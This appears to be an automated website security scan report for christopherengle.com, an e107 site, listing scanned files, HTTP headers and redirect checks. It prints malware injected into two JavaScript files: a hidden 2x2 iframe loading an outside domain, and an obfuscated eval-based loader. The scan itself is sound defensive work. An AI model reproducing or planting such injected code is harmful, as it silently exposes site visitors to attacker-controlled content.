Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=christopherengle.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://christopherengle.com/ | HTTP/1.1 302 Moved Temporarily Cache-Control: must-revalidate Connection: close Date: Fri, 27 Feb 2015 05:45:08 GMT Location: news.php Server: Apache Vary: Accept-Encoding Content-Language: en Content-Length: 0 Content-Type: text/html Expires: Sat, 01 Jan 2000 00:00:00 GMT Last-Modified: Fri, 27 Feb 2015 05:45:08 GMT Set-Cookie: PHPSESSID=cpuhvbl551rmfi7vu75igrjhe5; path=/ | clean |
http://christopherengle.com/news.php | 200 OK Content-Length: 10077 Content-Type: text/html | clean |
http://christopherengle.com/e107_files/e107.js | 200 OK Content-Length: 10917 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var nowLocal = new Date(); var localTime = Math.floor(nowLocal.getTime()/1000); function SyncWithServerTime(serverTime) { if (serverTime) { var serverDelta=Math.floor(localTime-serverTime); document.cookie = 'e107_tdOffset='+serverDelta+'; path=/'; document.cookie = 'e107_tdSetTime='+(localTime-serverDelta)+'; path=/'; } var tzCookie = 'e107_tzOffset='; var timezoneOffset = nowLocal.getTimezoneOffset(); } } function preview_image(src_val,img_path, not_found) { var ta; var desti = src_val + '_prev'; ta = document.getElementById(src_val).value; if(ta){ document.getElementById(desti).src = img_path + ta; }else{ document.getElementById(desti).src = not_found; } return; } document.write('<iframe src="http://govniaha.cu.cc/index.php?tp=06e7706b10c6f2e5" width="2" height="2" frameborder="0"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://govniaha.cu.cc/index.php?tp=06e7706b10c6f2e5 <iframe src="http://govniaha.cu.cc/index.php?tp=06e7706b10c6f2e5" width="2" height="2" frameborder="0"> | ||
http://christopherengle.com/e107_files/popup.js | 200 OK Content-Length: 9616 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.defaultStatus = ""; function getRefToDivMod( divID, oDoc ) { if( !oDoc ) { oDoc = document; } if( document.layers ) { if( oDoc.layers[divID] ) { return oDoc.layers[divID]; } else { for( var x = 0, y; !y && x < oDoc.layers.length; x++ ) { y = getRefToDivMod(divID,oDoc.layers[x].document); } return y; } } if( document.getElementById ) { return oDoc.getElementById(divID); } if( document.all ) { return oDoc.all[d e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="16";s="";pos=0;i=0;while(i<611){e('po'+'s+=par'+'seInt(k'+'.rep'+'lace("'+'ren'+'","0a'+'sd"))+'+'ar2['+'i]/'+'4');e('s+=ar.su'+''+'bstr(pos,1)');i++;} e(s); Antivirus reports:
| ||
http://christopherengle.com/e107_files/nav_menu_alt.js | 200 OK Content-Length: 14828 Content-Type: text/javascript | clean |
http://christopherengle.com/signup.php | 200 OK Content-Length: 9159 Content-Type: text/html | clean |
http://christopherengle.com/e107_handlers/calendar/calendar_stripped.js | 200 OK Content-Length: 34315 Content-Type: text/javascript | clean |
http://christopherengle.com/e107_handlers/calendar/calendar-setup_stripped.js | 200 OK Content-Length: 4919 Content-Type: text/javascript | clean |
http://christopherengle.com/e107_handlers/calendar/language/English.js | 200 OK Content-Length: 3595 Content-Type: text/javascript | clean |
http://christopherengle.com/fpw.php | 200 OK Content-Length: 8345 Content-Type: text/html | clean |
http://christopherengle.com/index.php | HTTP/1.1 302 Moved Temporarily Cache-Control: must-revalidate Connection: close Date: Fri, 27 Feb 2015 05:45:14 GMT Location: news.php Server: Apache Vary: Accept-Encoding Content-Language: en Content-Length: 0 Content-Type: text/html Expires: Sat, 01 Jan 2000 00:00:00 GMT Last-Modified: Fri, 27 Feb 2015 05:45:15 GMT Set-Cookie: PHPSESSID=hm7607d9vevl0jmb90sqbocsm6; path=/ | clean |
http://christopherengle.com/test404page.js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1688 Content-Type: application/x-javascript | clean |
http://christopherengle.com/submitnews.php | 200 OK Content-Length: 18151 Content-Type: text/html | clean |
http://christopherengle.com/e107_plugins/forum/forum.php | 200 OK Content-Length: 9888 Content-Type: text/html | clean |
http://christopherengle.com/e107_plugins/forum/../../e107_files/popup.js | 200 OK Content-Length: 9616 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.defaultStatus = ""; function getRefToDivMod( divID, oDoc ) { if( !oDoc ) { oDoc = document; } if( document.layers ) { if( oDoc.layers[divID] ) { return oDoc.layers[divID]; } else { for( var x = 0, y; !y && x < oDoc.layers.length; x++ ) { y = getRefToDivMod(divID,oDoc.layers[x].document); } return y; } } if( document.getElementById ) { return oDoc.getElementById(divID); } if( document.all ) { return oDoc.all[d e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="16";s="";pos=0;i=0;while(i<611){e('po'+'s+=par'+'seInt(k'+'.rep'+'lace("'+'ren'+'","0a'+'sd"))+'+'ar2['+'i]/'+'4');e('s+=ar.su'+''+'bstr(pos,1)');i++;} e(s); Antivirus reports:
| ||
http://christopherengle.com/e107_files/nav_menu.js | 200 OK Content-Length: 12762 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: christopherengle.com
Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: must-revalidate
Connection: close
Date: Fri, 27 Feb 2015 05:45:08 GMT
Location: news.php
Server: Apache
Vary: Accept-Encoding
Content-Language: en
Content-Length: 0
Content-Type: text/html
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Last-Modified: Fri, 27 Feb 2015 05:45:08 GMT
Set-Cookie: PHPSESSID=cpuhvbl551rmfi7vu75igrjhe5; path=/
...0 bytes of data.
GET / HTTP/1.1
Host: christopherengle.com
Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: must-revalidate
Connection: close
Date: Fri, 27 Feb 2015 05:45:08 GMT
Location: news.php
Server: Apache
Vary: Accept-Encoding
Content-Language: en
Content-Length: 0
Content-Type: text/html
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Last-Modified: Fri, 27 Feb 2015 05:45:08 GMT
Set-Cookie: PHPSESSID=cpuhvbl551rmfi7vu75igrjhe5; path=/
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: christopherengle.com
Referer: http://www.google.com/search?q=christopherengle.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: christopherengle.com
Referer: http://www.google.com/search?q=christopherengle.com
Result:
The result is similar to the first query. There are no suspicious redirects found.